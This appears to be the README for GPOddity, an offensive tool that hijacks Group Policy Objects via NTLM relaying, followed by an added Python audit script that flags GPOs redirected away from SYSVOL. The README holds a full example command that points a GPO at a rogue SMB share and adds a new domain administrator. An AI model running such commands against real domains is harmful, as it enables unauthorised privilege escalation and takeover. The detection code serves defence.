GPOddity: automating GPO attack vectors through NTLM relaying
The GPOddity project aims at automating GPO attack vectors through NTLM relaying (and more).
For more details regarding the attack and a demonstration of how to use the tool, see the associated article available here.
You can install GPOddity through pipx with the following command:
Alternatively, you can install GPOddity manually by cloning the repository and installing the dependencies:
$ python3 -m pip install -r requirements.txt
Below are some example commands taken from the article linked above.
Exploiting a Computer GPO to add a local administrator (running the embedded SMB server).
Exploiting a User GPO to add a domain administrator (no embedded SMB server).
$ python3 gpoddity.py --gpo-id '7B36419B-B566-46FA-A7B7-58CA9030A604' --gpo-type 'user' --no-smb-server --domain 'corp.com' --username 'GPODDITY$' --password '[…]' --command 'net user user_gpo Password123! /add /domain && net group "Domain Admins" user_gpo /ADD /DOMAIN' --rogue-smbserver-ip '192.168.58.102' --rogue-smbserver-share 'synacktiv'
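A defender-side check, added here as an example that is not part of GPOddity or the article: it walks groupPolicyContainer objects as an LDAP search would return them (a constructed sample below) and flags any GPO whose gPCFileSysPath points outside the domain's SYSVOL, which is how a GPO redirected to a rogue share such as the --rogue-smbserver-ip / --rogue-smbserver-share pair in the command above shows up. The function names, the trusted DC list and the sample records are assumptions; the GUID, IP and share name are taken from the README.

```python
import re
from typing import Dict, Iterable, List, Tuple

# Constructed sample of groupPolicyContainer objects (cn = GPO GUID,
# gPCFileSysPath = UNC path clients fetch the policy files from).
# The first GUID, the IP and the share name come from the README above.
SAMPLE_GPOS: List[Dict[str, str]] = [
    {"cn": "{7B36419B-B566-46FA-A7B7-58CA9030A604}", "displayName": "Sales user settings",
     "gPCFileSysPath": r"\\corp.com\SysVol\corp.com\Policies\{7B36419B-B566-46FA-A7B7-58CA9030A604}"},
    {"cn": "{11111111-2222-3333-4444-555555555555}", "displayName": "Workstation hardening",
     "gPCFileSysPath": r"\\192.168.58.102\synacktiv"},          # redirected to a rogue share
    {"cn": "{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}", "displayName": "Laptop settings",
     "gPCFileSysPath": r"\\corp.com\SysVol\corp.com\Policies\{11111111-2222-3333-4444-555555555555}"},
]

# \\<host>\<share>[\<rest>]
UNC_RE = re.compile(r"^\\\\([^\\]+)\\([^\\]+)(?:\\(.*))?$")

def check_gpo_path(domain: str, cn: str, path: str, trusted_hosts: Iterable[str] = ()) -> List[str]:
    """Return the reasons a gPCFileSysPath looks hijacked; an empty list means it looks fine."""
    # Legitimate form: \\<domain or DC>\SysVol\<domain>\Policies\<cn>
    m = UNC_RE.match(path)
    if not m:
        return ["not a UNC path"]
    host, share, rest = m.group(1), m.group(2), m.group(3) or ""
    reasons = []
    allowed = {domain.lower(), *(h.lower() for h in trusted_hosts)}
    if host.lower() not in allowed:
        reasons.append(f"host {host!r} is not the domain or a known DC")
    if share.lower() != "sysvol":
        reasons.append(f"share {share!r} is not SYSVOL")
    parts = [p.lower() for p in rest.rstrip("\\").split("\\")] if rest else []
    if parts != [domain.lower(), "policies", cn.lower()]:
        reasons.append(f"path does not end in {domain}\\Policies\\{cn}")
    return reasons

def audit_gpo_paths(domain: str, gpos: Iterable[Dict[str, str]],
                    trusted_hosts: Iterable[str] = ()) -> List[Tuple[str, str, List[str]]]:
    """Return (cn, gPCFileSysPath, reasons) for every GPO whose path fails the check."""
    findings = []
    for gpo in gpos:
        reasons = check_gpo_path(domain, gpo["cn"], gpo["gPCFileSysPath"], trusted_hosts)
        if reasons:
            findings.append((gpo["cn"], gpo["gPCFileSysPath"], reasons))
    return findings

if __name__ == "__main__":
    for cn, path, reasons in audit_gpo_paths("corp.com", SAMPLE_GPOS, ["dc01.corp.com"]):
        print(f"[!] {cn} -> {path}: {'; '.join(reasons)}")
```

On a real domain, feed the function the result of an LDAP search for objectClass=groupPolicyContainer and list your DC hostnames in trusted_hosts; the same check can be scheduled to alert on any change to gPCFileSysPath.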